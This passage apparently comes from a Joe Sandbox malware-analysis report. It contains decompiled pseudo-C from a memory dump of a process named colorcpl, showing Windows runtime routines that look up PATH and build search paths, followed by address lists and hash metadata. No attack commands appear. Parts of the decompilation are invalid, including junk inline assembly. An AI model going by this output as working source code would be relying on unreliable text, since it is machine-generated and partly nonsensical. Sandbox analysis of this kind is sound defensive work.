                                                                                                							_t325 = 0xc0000017;
                                                                                                							goto L32;
                                                                                                						} else {
                                                                                                							 *(_t324 + 0x44) =  *(_t324 + 0x44) & 0x00000000;
                                                                                                							_t50 = _t324 + 0x48; // 0x48
                                                                                                							_t319 = _t50;
                                                                                                							_t305 = _v32;
                                                                                                							 *((intOrPtr*)(_t324 + 0x3c)) = _t276;
                                                                                                							_t278 = 0;
                                                                                                							 *((short*)(_t324 + 0x30)) = _v48;
                                                                                                							__eflags = _t305;
                                                                                                							if(_t305 != 0) {
                                                                                                								 *(_t324 + 0x18) = _t319;
                                                                                                								__eflags = _t305 - 0x6f08478;
                                                                                                								 *_t324 = ((0 | _t305 == 0x06f08478) - 0x00000001 & 0xfffffffb) + 7;
                                                                                                								E06E5F3E0(_t319,  *((intOrPtr*)(_t305 + 4)),  *_t305 & 0x0000ffff);
                                                                                                								_t305 = _v32;
                                                                                                								_t335 = _t335 + 0xc;
                                                                                                								_t278 = 1;
                                                                                                								__eflags = _a8;
                                                                                                								_t319 = _t319 + (( *_t305 & 0x0000ffff) >> 1) * 2;
                                                                                                								if(_a8 != 0) {
                                                                                                									_t269 = E06EA39F2(_t319);
                                                                                                									_t305 = _v32;
                                                                                                									_t319 = _t269;
                                                                                                								}
                                                                                                							}
                                                                                                							_t289 = 0;
                                                                                                							_v16 = 0;
                                                                                                							__eflags = _v48;
                                                                                                							if(_v48 <= 0) {
                                                                                                								L31:
                                                                                                								_t325 = _v68;
                                                                                                								__eflags = 0;
                                                                                                								 *((short*)(_t319 - 2)) = 0;
                                                                                                								goto L32;
                                                                                                							} else {
                                                                                                								_t280 = _t324 + _t278 * 4;
                                                                                                								_v56 = _t280;
                                                                                                								do {
                                                                                                									__eflags = _t305;
                                                                                                									if(_t305 != 0) {
                                                                                                										_t229 =  *(_v60 + _t289 * 4);
                                                                                                										__eflags = _t229;
                                                                                                										if(_t229 == 0) {
                                                                                                											goto L30;
                                                                                                										} else {
                                                                                                											__eflags = _t229 == 5;
                                                                                                											if(_t229 == 5) {
                                                                                                												goto L30;
                                                                                                											} else {
                                                                                                												goto L22;
                                                                                                											}
                                                                                                										}
                                                                                                									} else {
                                                                                                										L22:
                                                                                                										 *_t280 =  *(_v60 + _t289 * 4);
                                                                                                										 *(_t280 + 0x18) = _t319;
                                                                                                										_t233 =  *(_v60 + _t289 * 4);
                                                                                                										__eflags = _t233 - 8;
                                                                                                										if(_t233 > 8) {
                                                                                                											goto L56;
                                                                                                										} else {
                                                                                                											switch( *((intOrPtr*)(_t233 * 4 +  &M06E42959))) {
                                                                                                												case 0:
                                                                                                													__ax =  *0x6f08488;
                                                                                                													__eflags = __ax;
                                                                                                													if(__ax == 0) {
                                                                                                														goto L29;
                                                                                                													} else {
                                                                                                														__ax & 0x0000ffff = E06E5F3E0(__edi,  *0x6f0848c, __ax & 0x0000ffff);
                                                                                                														__eax =  *0x6f08488 & 0x0000ffff;
                                                                                                														goto L26;
                                                                                                													}
                                                                                                													goto L108;
                                                                                                												case 1:
                                                                                                													L45:
                                                                                                													E06E5F3E0(_t319, _v80, _v64);
                                                                                                													_t264 = _v64;
                                                                                                													goto L26;
                                                                                                												case 2:
                                                                                                													 *0x6f08480 & 0x0000ffff = E06E5F3E0(__edi,  *0x6f08484,  *0x6f08480 & 0x0000ffff);
                                                                                                													__eax =  *0x6f08480 & 0x0000ffff;
                                                                                                													__eax = ( *0x6f08480 & 0x0000ffff) >> 1;
                                                                                                													__edi = __edi + __eax * 2;
                                                                                                													goto L28;
                                                                                                												case 3:
                                                                                                													__eax = _v44;
                                                                                                													__eflags = __eax;
                                                                                                													if(__eax == 0) {
                                                                                                														goto L29;
                                                                                                													} else {
                                                                                                														__esi = __eax + __eax;
                                                                                                														__eax = E06E5F3E0(__edi, _v72, __esi);
                                                                                                														__edi = __edi + __esi;
                                                                                                														__esi = _v52;
                                                                                                														goto L27;
                                                                                                													}
                                                                                                													goto L108;
                                                                                                												case 4:
                                                                                                													_push(0x2e);
                                                                                                													_pop(__eax);
                                                                                                													 *(__esi + 0x44) = __edi;
                                                                                                													 *__edi = __ax;
                                                                                                													__edi = __edi + 4;
                                                                                                													_push(0x3b);
                                                                                                													_pop(__eax);
                                                                                                													 *(__edi - 2) = __ax;
                                                                                                													goto L29;
                                                                                                												case 5:
                                                                                                													__eflags = _v36;
                                                                                                													if(_v36 == 0) {
                                                                                                														goto L45;
                                                                                                													} else {
                                                                                                														E06E5F3E0(_t319, _v76, _v36);
                                                                                                														_t264 = _v36;
                                                                                                													}
                                                                                                													L26:
                                                                                                													_t335 = _t335 + 0xc;
                                                                                                													_t319 = _t319 + (_t264 >> 1) * 2 + 2;
                                                                                                													__eflags = _t319;
                                                                                                													L27:
                                                                                                													_push(0x3b);
                                                                                                													_pop(_t266);
                                                                                                													 *((short*)(_t319 - 2)) = _t266;
                                                                                                													goto L28;
                                                                                                												case 6:
                                                                                                													__ebx =  *0x6f0575c;
                                                                                                													__eflags = __ebx - 0x6f0575c;
                                                                                                													if(__ebx != 0x6f0575c) {
                                                                                                														_push(0x3b);
                                                                                                														_pop(__esi);
                                                                                                														do {
                                                                                                															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                                                                                                															E06E5F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                                                                                															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                                                                                															__edi = __edi + __eax * 2;
                                                                                                															__edi = __edi + 2;
                                                                                                															 *(__edi - 2) = __si;
                                                                                                															__ebx =  *__ebx;
                                                                                                															__eflags = __ebx - 0x6f0575c;
                                                                                                														} while (__ebx != 0x6f0575c);
                                                                                                														__esi = _v52;
                                                                                                														__ecx = _v16;
                                                                                                														__edx = _v32;
                                                                                                													}
                                                                                                													__ebx = _v56;
                                                                                                													goto L29;
                                                                                                												case 7:
                                                                                                													 *0x6f08478 & 0x0000ffff = E06E5F3E0(__edi,  *0x6f0847c,  *0x6f08478 & 0x0000ffff);
                                                                                                													__eax =  *0x6f08478 & 0x0000ffff;
                                                                                                													__eax = ( *0x6f08478 & 0x0000ffff) >> 1;
                                                                                                													__eflags = _a8;
                                                                                                													__edi = __edi + __eax * 2;
                                                                                                													if(_a8 != 0) {
                                                                                                														__ecx = __edi;
                                                                                                														__eax = E06EA39F2(__ecx);
                                                                                                														__edi = __eax;
                                                                                                													}
                                                                                                													goto L28;
                                                                                                												case 8:
                                                                                                													__eax = 0;
                                                                                                													 *(__edi - 2) = __ax;
                                                                                                													 *0x6f06e58 & 0x0000ffff = E06E5F3E0(__edi,  *0x6f06e5c,  *0x6f06e58 & 0x0000ffff);
                                                                                                													 *(__esi + 0x38) = __edi;
                                                                                                													__eax =  *0x6f06e58 & 0x0000ffff;
                                                                                                													__eax = ( *0x6f06e58 & 0x0000ffff) >> 1;
                                                                                                													__edi = __edi + __eax * 2;
                                                                                                													__edi = __edi + 2;
                                                                                                													L28:
                                                                                                													_t289 = _v16;
                                                                                                													_t305 = _v32;
                                                                                                													L29:
                                                                                                													_t280 = _t280 + 4;
                                                                                                													__eflags = _t280;
                                                                                                													_v56 = _t280;
                                                                                                													goto L30;
                                                                                                											}
                                                                                                										}
                                                                                                									}
                                                                                                									goto L108;
                                                                                                									L30:
                                                                                                									_t289 = _t289 + 1;
                                                                                                									_v16 = _t289;
                                                                                                									__eflags = _t289 - _v48;
                                                                                                								} while (_t289 < _v48);
                                                                                                								goto L31;
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				} else {
                                                                                                					while(1) {
                                                                                                						L1:
                                                                                                						_t271 =  *(_v60 + _t317 * 4);
                                                                                                						if(_t271 > 8) {
                                                                                                							break;
                                                                                                						}
                                                                                                						switch( *((intOrPtr*)(_t271 * 4 +  &M06E42935))) {
                                                                                                							case 0:
                                                                                                								__ax =  *0x6f08488;
                                                                                                								__eflags = __ax;
                                                                                                								if(__ax != 0) {
                                                                                                									__eax = __ax & 0x0000ffff;
                                                                                                									__ebx = __ebx + 2;
                                                                                                									__eflags = __ebx;
                                                                                                									goto L53;
                                                                                                								}
                                                                                                								goto L14;
                                                                                                							case 1:
                                                                                                								L44:
                                                                                                								_t305 =  &_v64;
                                                                                                								_v80 = E06E42E3E(0,  &_v64);
                                                                                                								_t276 = _t276 + _v64 + 2;
                                                                                                								goto L13;
                                                                                                							case 2:
                                                                                                								__eax =  *0x6f08480 & 0x0000ffff;
                                                                                                								__ebx = __ebx + __eax;
                                                                                                								__eflags = __dl;
                                                                                                								if(__dl != 0) {
                                                                                                									__eax = 0x6f08480;
                                                                                                									goto L80;
                                                                                                								}
                                                                                                								goto L14;
                                                                                                							case 3:
                                                                                                								__eax = E06E2EEF0(0x6f079a0);
                                                                                                								__eax =  &_v44;
                                                                                                								_push(__eax);
                                                                                                								_push(0);
                                                                                                								_push(0);
                                                                                                								_push(4);
                                                                                                								_push(L"PATH");
                                                                                                								_push(0);
                                                                                                								L57();
                                                                                                								__esi = __eax;
                                                                                                								_v68 = __esi;
                                                                                                								__eflags = __esi - 0xc0000023;
                                                                                                								if(__esi != 0xc0000023) {
                                                                                                									L10:
                                                                                                									__eax = E06E2EB70(__ecx, 0x6f079a0);
                                                                                                									__eflags = __esi - 0xc0000100;
                                                                                                									if(__esi == 0xc0000100) {
                                                                                                										_v44 = _v44 & 0x00000000;
                                                                                                										__eax = 0;
                                                                                                										_v68 = 0;
                                                                                                										goto L13;
                                                                                                									} else {
                                                                                                										__eflags = __esi;
                                                                                                										if(__esi < 0) {
                                                                                                											L32:
                                                                                                											_t207 = _v72;
                                                                                                											__eflags = _t207;
                                                                                                											if(_t207 != 0) {
                                                                                                												L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t207);
                                                                                                											}
                                                                                                											_t208 = _v52;
                                                                                                											__eflags = _t208;
                                                                                                											if(_t208 != 0) {
                                                                                                												__eflags = _t325;
                                                                                                												if(_t325 < 0) {
                                                                                                													L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t208);
                                                                                                													_t208 = 0;
                                                                                                												}
                                                                                                											}
                                                                                                											goto L36;
                                                                                                										} else {
                                                                                                											__eax = _v44;
                                                                                                											__ebx = __ebx + __eax * 2;
                                                                                                											__ebx = __ebx + 2;
                                                                                                											__eflags = __ebx;
                                                                                                											L13:
                                                                                                											_t285 = _v36;
                                                                                                											goto L14;
                                                                                                										}
                                                                                                									}
                                                                                                								} else {
                                                                                                									__eax = _v44;
                                                                                                									__ecx =  *0x6f07b9c; // 0x0
                                                                                                									_v44 + _v44 =  *[fs:0x30];
                                                                                                									__ecx = __ecx + 0x180000;
                                                                                                									__eax = L06E34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                                                                                									_v72 = __eax;
                                                                                                									__eflags = __eax;
                                                                                                									if(__eax == 0) {
                                                                                                										__eax = E06E2EB70(__ecx, 0x6f079a0);
                                                                                                										__eax = _v52;
                                                                                                										L36:
                                                                                                										_pop(_t318);
                                                                                                										_pop(_t326);
                                                                                                										__eflags = _v8 ^ _t331;
                                                                                                										_pop(_t277);
                                                                                                										return E06E5B640(_t208, _t277, _v8 ^ _t331, _t305, _t318, _t326);
                                                                                                									} else {
                                                                                                										__ecx =  &_v44;
                                                                                                										_push(__ecx);
                                                                                                										_push(_v44);
                                                                                                										_push(__eax);
                                                                                                										_push(4);
                                                                                                										_push(L"PATH");
                                                                                                										_push(0);
                                                                                                										L57();
                                                                                                										__esi = __eax;
                                                                                                										_v68 = __eax;
                                                                                                										goto L10;
                                                                                                									}
                                                                                                								}
                                                                                                								goto L108;
                                                                                                							case 4:
                                                                                                								__ebx = __ebx + 4;
                                                                                                								goto L14;
                                                                                                							case 5:
                                                                                                								_t272 = _v56;
                                                                                                								if(_v56 != 0) {
                                                                                                									_t305 =  &_v36;
                                                                                                									_t274 = E06E42E3E(_t272,  &_v36);
                                                                                                									_t285 = _v36;
                                                                                                									_v76 = _t274;
                                                                                                								}
                                                                                                								if(_t285 == 0) {
                                                                                                									goto L44;
                                                                                                								} else {
                                                                                                									_t276 = _t276 + 2 + _t285;
                                                                                                								}
                                                                                                								goto L14;
                                                                                                							case 6:
                                                                                                								__eax =  *0x6f05764 & 0x0000ffff;
                                                                                                								goto L53;
                                                                                                							case 7:
                                                                                                								__eax =  *0x6f08478 & 0x0000ffff;
                                                                                                								__ebx = __ebx + __eax;
                                                                                                								__eflags = _a8;
                                                                                                								if(_a8 != 0) {
                                                                                                									__ebx = __ebx + 0x16;
                                                                                                									__ebx = __ebx + __eax;
                                                                                                								}
                                                                                                								__eflags = __dl;
                                                                                                								if(__dl != 0) {
                                                                                                									__eax = 0x6f08478;
                                                                                                									L80:
                                                                                                									_v32 = __eax;
                                                                                                								}
                                                                                                								goto L14;
                                                                                                							case 8:
                                                                                                								__eax =  *0x6f06e58 & 0x0000ffff;
                                                                                                								__eax = ( *0x6f06e58 & 0x0000ffff) + 2;
                                                                                                								L53:
                                                                                                								__ebx = __ebx + __eax;
                                                                                                								L14:
                                                                                                								_t317 = _t317 + 1;
                                                                                                								if(_t317 >= _v48) {
                                                                                                									goto L16;
                                                                                                								} else {
                                                                                                									_t305 = _v37;
                                                                                                									goto L1;
                                                                                                								}
                                                                                                								goto L108;
                                                                                                						}
                                                                                                					}
                                                                                                					L56:
                                                                                                					asm("int 0x29");
                                                                                                					asm("out 0x28, al");
                                                                                                					asm("in al, 0x6");
                                                                                                					asm("o16 sub ah, ah");
                                                                                                					asm("loopne 0x29");
                                                                                                					asm("in al, 0x6");
                                                                                                					asm("in al, 0x6");
                                                                                                					_t281 = es;
                                                                                                					0xeb0cbd5a(es, 0x25);
                                                                                                					_t337 = 0;
                                                                                                					 *0x1D000C7D =  *((char*)(0x1d000c7d)) - 0xe4;
                                                                                                					asm("in al, 0x6");
                                                                                                					_t328 = _t324 + 1 - 1;
                                                                                                					asm("daa");
                                                                                                					asm("in al, 0x6");
                                                                                                					asm("fcomp dword [ebx-0x18]");
                                                                                                					asm("in al, 0x6");
                                                                                                					0xd3b0f586(es, es, es, ds, es, es, es);
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					_push(0x20);
                                                                                                					_push(0x6eeff00);
                                                                                                					E06E6D08C(_t281, _t319, _t328);
                                                                                                					_v44 =  *[fs:0x18];
                                                                                                					_t320 = 0;
                                                                                                					 *_a24 = 0;
                                                                                                					_t282 = _a12;
                                                                                                					__eflags = _t282;
                                                                                                					if(_t282 == 0) {
                                                                                                						_t244 = 0xc0000100;
                                                                                                					} else {
                                                                                                						_v8 = 0;
                                                                                                						_t329 = 0xc0000100;
                                                                                                						_v52 = 0xc0000100;
                                                                                                						_t246 = 4;
                                                                                                						while(1) {
                                                                                                							_v40 = _t246;
                                                                                                							__eflags = _t246;
                                                                                                							if(_t246 == 0) {
                                                                                                								break;
                                                                                                							}
                                                                                                							_t295 = _t246 * 0xc;
                                                                                                							_v48 = _t295;
                                                                                                							__eflags = _t282 -  *((intOrPtr*)(_t295 + 0x6df1664));
                                                                                                							if(__eflags <= 0) {
                                                                                                								if(__eflags == 0) {
                                                                                                									_t261 = E06E5E5C0(_a8,  *((intOrPtr*)(_t295 + 0x6df1668)), _t282);
                                                                                                									_t337 = _t337 + 0xc;
                                                                                                									__eflags = _t261;
                                                                                                									if(__eflags == 0) {
                                                                                                										_t329 = E06E951BE(_t282,  *((intOrPtr*)(_v48 + 0x6df166c)), _a16, _t320, _t329, __eflags, _a20, _a24);
                                                                                                										_v52 = _t329;
                                                                                                										break;
                                                                                                									} else {
                                                                                                										_t246 = _v40;
                                                                                                										goto L62;
                                                                                                									}
                                                                                                									goto L70;
                                                                                                								} else {
                                                                                                									L62:
                                                                                                									_t246 = _t246 - 1;
                                                                                                									continue;
                                                                                                								}
                                                                                                							}
                                                                                                							break;
                                                                                                						}
                                                                                                						_v32 = _t329;
                                                                                                						__eflags = _t329;
                                                                                                						if(_t329 < 0) {
                                                                                                							__eflags = _t329 - 0xc0000100;
                                                                                                							if(_t329 == 0xc0000100) {
                                                                                                								_t291 = _a4;
                                                                                                								__eflags = _t291;
                                                                                                								if(_t291 != 0) {
                                                                                                									_v36 = _t291;
                                                                                                									__eflags =  *_t291 - _t320;
                                                                                                									if( *_t291 == _t320) {
                                                                                                										_t329 = 0xc0000100;
                                                                                                										goto L76;
                                                                                                									} else {
                                                                                                										_t308 =  *((intOrPtr*)(_v44 + 0x30));
                                                                                                										_t248 =  *((intOrPtr*)(_t308 + 0x10));
                                                                                                										__eflags =  *((intOrPtr*)(_t248 + 0x48)) - _t291;
                                                                                                										if( *((intOrPtr*)(_t248 + 0x48)) == _t291) {
                                                                                                											__eflags =  *(_t308 + 0x1c);
                                                                                                											if( *(_t308 + 0x1c) == 0) {
                                                                                                												L106:
                                                                                                												_t329 = E06E42AE4( &_v36, _a8, _t282, _a16, _a20, _a24);
                                                                                                												_v32 = _t329;
                                                                                                												__eflags = _t329 - 0xc0000100;
                                                                                                												if(_t329 != 0xc0000100) {
                                                                                                													goto L69;
                                                                                                												} else {
                                                                                                													_t320 = 1;
                                                                                                													_t291 = _v36;
                                                                                                													goto L75;
                                                                                                												}
                                                                                                											} else {
                                                                                                												_t251 = E06E26600( *(_t308 + 0x1c));
                                                                                                												__eflags = _t251;
                                                                                                												if(_t251 != 0) {
                                                                                                													goto L106;
                                                                                                												} else {
                                                                                                													_t291 = _a4;
                                                                                                													goto L75;
                                                                                                												}
                                                                                                											}
                                                                                                										} else {
                                                                                                											L75:
                                                                                                											_t329 = E06E42C50(_t291, _a8, _t282, _a16, _a20, _a24, _t320);
                                                                                                											L76:
                                                                                                											_v32 = _t329;
                                                                                                											goto L69;
                                                                                                										}
                                                                                                									}
                                                                                                									goto L108;
                                                                                                								} else {
                                                                                                									E06E2EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                                									_v8 = 1;
                                                                                                									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                                                                                                									_t329 = _a24;
                                                                                                									_t258 = E06E42AE4( &_v36, _a8, _t282, _a16, _a20, _t329);
                                                                                                									_v32 = _t258;
                                                                                                									__eflags = _t258 - 0xc0000100;
                                                                                                									if(_t258 == 0xc0000100) {
                                                                                                										_v32 = E06E42C50(_v36, _a8, _t282, _a16, _a20, _t329, 1);
                                                                                                									}
                                                                                                									_v8 = _t320;
                                                                                                									E06E42ACB();
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                						L69:
                                                                                                						_v8 = 0xfffffffe;
                                                                                                						_t244 = _t329;
                                                                                                					}
                                                                                                					L70:
                                                                                                					return E06E6D0D1(_t244);
                                                                                                				}
                                                                                                				L108:
                                                                                                			}





















































                                                                                                0x06e4272c
                                                                                                0x06e42700
                                                                                                0x06e425ef
                                                                                                0x06e425ef
                                                                                                0x06e425ef
                                                                                                0x06e425f2
                                                                                                0x06e425f8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e425fe
                                                                                                0x00000000
                                                                                                0x06e428e6
                                                                                                0x06e428ec
                                                                                                0x06e428ef
                                                                                                0x06e428f5
                                                                                                0x06e428f8
                                                                                                0x06e428f8
                                                                                                0x00000000
                                                                                                0x06e428f8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e42866
                                                                                                0x06e42866
                                                                                                0x06e42876
                                                                                                0x06e42879
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e427e0
                                                                                                0x06e427e7
                                                                                                0x06e427e9
                                                                                                0x06e427eb
                                                                                                0x06e85afd
                                                                                                0x00000000
                                                                                                0x06e85afd
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e42633
                                                                                                0x06e42638
                                                                                                0x06e4263b
                                                                                                0x06e4263c
                                                                                                0x06e4263e
                                                                                                0x06e42640
                                                                                                0x06e42642
                                                                                                0x06e42647
                                                                                                0x06e42649
                                                                                                0x06e4264e
                                                                                                0x06e42650
                                                                                                0x06e42653
                                                                                                0x06e42659
                                                                                                0x06e426a2
                                                                                                0x06e426a7
                                                                                                0x06e426ac
                                                                                                0x06e426b2
                                                                                                0x06e85b11
                                                                                                0x06e85b15
                                                                                                0x06e85b17
                                                                                                0x00000000
                                                                                                0x06e426b8
                                                                                                0x06e426b8
                                                                                                0x06e426ba
                                                                                                0x06e427a6
                                                                                                0x06e427a6
                                                                                                0x06e427a9
                                                                                                0x06e427ab
                                                                                                0x06e427b9
                                                                                                0x06e427b9
                                                                                                0x06e427be
                                                                                                0x06e427c1
                                                                                                0x06e427c3
                                                                                                0x06e427c5
                                                                                                0x06e427c7
                                                                                                0x06e85c74
                                                                                                0x06e85c79
                                                                                                0x06e85c79
                                                                                                0x06e427c7
                                                                                                0x00000000
                                                                                                0x06e426c0
                                                                                                0x06e426c0
                                                                                                0x06e426c3
                                                                                                0x06e426c6
                                                                                                0x06e426c6
                                                                                                0x06e426c9
                                                                                                0x06e426c9
                                                                                                0x00000000
                                                                                                0x06e426c9
                                                                                                0x06e426ba
                                                                                                0x06e4265b
                                                                                                0x06e4265b
                                                                                                0x06e4265e
                                                                                                0x06e42667
                                                                                                0x06e4266d
                                                                                                0x06e42677
                                                                                                0x06e4267c
                                                                                                0x06e4267f
                                                                                                0x06e42681
                                                                                                0x06e85b49
                                                                                                0x06e85b4e
                                                                                                0x06e427cd
                                                                                                0x06e427d0
                                                                                                0x06e427d1
                                                                                                0x06e427d2
                                                                                                0x06e427d4
                                                                                                0x06e427dd
                                                                                                0x06e42687
                                                                                                0x06e42687
                                                                                                0x06e4268a
                                                                                                0x06e4268b
                                                                                                0x06e4268e
                                                                                                0x06e4268f
                                                                                                0x06e42691
                                                                                                0x06e42696
                                                                                                0x06e42698
                                                                                                0x06e4269d
                                                                                                0x06e4269f
                                                                                                0x00000000
                                                                                                0x06e4269f
                                                                                                0x06e42681
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e42846
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e42605
                                                                                                0x06e4260a
                                                                                                0x06e4260c
                                                                                                0x06e42611
                                                                                                0x06e42616
                                                                                                0x06e42619
                                                                                                0x06e42619
                                                                                                0x06e4261e
                                                                                                0x00000000
                                                                                                0x06e42624
                                                                                                0x06e42627
                                                                                                0x06e42627
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e85b1f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e42894
                                                                                                0x06e4289b
                                                                                                0x06e4289d
                                                                                                0x06e428a1
                                                                                                0x06e85b2b
                                                                                                0x06e85b2e
                                                                                                0x06e85b2e
                                                                                                0x06e428a7
                                                                                                0x06e428a9
                                                                                                0x06e85b04
                                                                                                0x06e85b09
                                                                                                0x06e85b09
                                                                                                0x06e85b09
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e85b35
                                                                                                0x06e85b3c
                                                                                                0x06e428fb
                                                                                                0x06e428fb
                                                                                                0x06e426cc
                                                                                                0x06e426cc
                                                                                                0x06e426d0
                                                                                                0x00000000
                                                                                                0x06e426d2
                                                                                                0x06e426d2
                                                                                                0x00000000
                                                                                                0x06e426d2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e425fe
                                                                                                0x06e4292d
                                                                                                0x06e42930
                                                                                                0x06e42935
                                                                                                0x06e42937
                                                                                                0x06e42939
                                                                                                0x06e4293d
                                                                                                0x06e4293f
                                                                                                0x06e42941
                                                                                                0x06e4294e
                                                                                                0x06e4294f
                                                                                                0x06e4295a
                                                                                                0x06e4295d
                                                                                                0x06e42963
                                                                                                0x06e42969
                                                                                                0x06e4296e
                                                                                                0x06e4296f
                                                                                                0x06e42971
                                                                                                0x06e42977
                                                                                                0x06e4297b
                                                                                                0x06e42980
                                                                                                0x06e42981
                                                                                                0x06e42982
                                                                                                0x06e42983
                                                                                                0x06e42984
                                                                                                0x06e42985
                                                                                                0x06e42986
                                                                                                0x06e42987
                                                                                                0x06e42988
                                                                                                0x06e42989
                                                                                                0x06e4298a
                                                                                                0x06e4298b
                                                                                                0x06e4298c
                                                                                                0x06e4298d
                                                                                                0x06e4298e
                                                                                                0x06e4298f
                                                                                                0x06e42990
                                                                                                0x06e42992
                                                                                                0x06e42997
                                                                                                0x06e429a3
                                                                                                0x06e429a6
                                                                                                0x06e429ab
                                                                                                0x06e429ad
                                                                                                0x06e429b0
                                                                                                0x06e429b2
                                                                                                0x06e85c80
                                                                                                0x06e429b8
                                                                                                0x06e429b8
                                                                                                0x06e429bb
                                                                                                0x06e429c0
                                                                                                0x06e429c5
                                                                                                0x06e429c6
                                                                                                0x06e429c6
                                                                                                0x06e429c9
                                                                                                0x06e429cb
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e429cd
                                                                                                0x06e429d0
                                                                                                0x06e429d9
                                                                                                0x06e429db
                                                                                                0x06e429dd
                                                                                                0x06e42a7f
                                                                                                0x06e42a84
                                                                                                0x06e42a87
                                                                                                0x06e42a89
                                                                                                0x06e85ca1
                                                                                                0x06e85ca3
                                                                                                0x00000000
                                                                                                0x06e42a8f
                                                                                                0x06e42a8f
                                                                                                0x00000000
                                                                                                0x06e42a8f
                                                                                                0x00000000
                                                                                                0x06e429e3
                                                                                                0x06e429e3
                                                                                                0x06e429e3
                                                                                                0x00000000
                                                                                                0x06e429e3
                                                                                                0x06e429dd
                                                                                                0x00000000
                                                                                                0x06e429db
                                                                                                0x06e429e6
                                                                                                0x06e429e9
                                                                                                0x06e429eb
                                                                                                0x06e429ed
                                                                                                0x06e429f3
                                                                                                0x06e429f5
                                                                                                0x06e429f8
                                                                                                0x06e429fa
                                                                                                0x06e42a97
                                                                                                0x06e42a9a
                                                                                                0x06e42a9d
                                                                                                0x06e42add

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: PATH
                                                                                                • API String ID: 0-1036084923
                                                                                                • Opcode ID: 9e72a90174ce533e6e4b1727bec8abbf7fe34f9ace9449132acdfc0e0dad3ec3
                                                                                                • Instruction ID: e0200fdc7b5962a39e2a81cf1532b83318a365cf1c7b696fc6dc362f200a7fc4
                                                                                                • Opcode Fuzzy Hash: 9e72a90174ce533e6e4b1727bec8abbf7fe34f9ace9449132acdfc0e0dad3ec3
                                                                                                • Instruction Fuzzy Hash: F2C1B275D10319EFDB94EFA9E880AEDB7B5FF48740F045069F615AB290D734AA01CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 63%
                                                                                                			E06E12D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                                                                                				signed char _v8;
                                                                                                				signed int _v12;
                                                                                                				signed int _v16;
                                                                                                				signed int _v20;
                                                                                                				signed int _v24;
                                                                                                				intOrPtr _v28;
                                                                                                				intOrPtr _v32;
                                                                                                				signed int _v52;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				intOrPtr _t55;
                                                                                                				signed int _t57;
                                                                                                				signed int _t58;
                                                                                                				char* _t62;
                                                                                                				signed char* _t63;
                                                                                                				signed char* _t64;
                                                                                                				signed int _t67;
                                                                                                				signed int _t72;
                                                                                                				signed int _t77;
                                                                                                				signed int _t78;
                                                                                                				signed int _t88;
                                                                                                				intOrPtr _t89;
                                                                                                				signed char _t93;
                                                                                                				signed int _t97;
                                                                                                				signed int _t98;
                                                                                                				signed int _t102;
                                                                                                				signed int _t103;
                                                                                                				intOrPtr _t104;
                                                                                                				signed int _t105;
                                                                                                				signed int _t106;
                                                                                                				signed char _t109;
                                                                                                				signed int _t111;
                                                                                                				void* _t116;
                                                                                                
                                                                                                				_t102 = __edi;
                                                                                                				_t97 = __edx;
                                                                                                				_v12 = _v12 & 0x00000000;
                                                                                                				_t55 =  *[fs:0x18];
                                                                                                				_t109 = __ecx;
                                                                                                				_v8 = __edx;
                                                                                                				_t86 = 0;
                                                                                                				_v32 = _t55;
                                                                                                				_v24 = 0;
                                                                                                				_push(__edi);
                                                                                                				if(__ecx == 0x6f05350) {
                                                                                                					_t86 = 1;
                                                                                                					_v24 = 1;
                                                                                                					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                                                                                				}
                                                                                                				_t103 = _t102 | 0xffffffff;
                                                                                                				if( *0x6f07bc8 != 0) {
                                                                                                					_push(0xc000004b);
                                                                                                					_push(_t103);
                                                                                                					E06E597C0();
                                                                                                				}
                                                                                                				if( *0x6f079c4 != 0) {
                                                                                                					_t57 = 0;
                                                                                                				} else {
                                                                                                					_t57 = 0x6f079c8;
                                                                                                				}
                                                                                                				_v16 = _t57;
                                                                                                				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
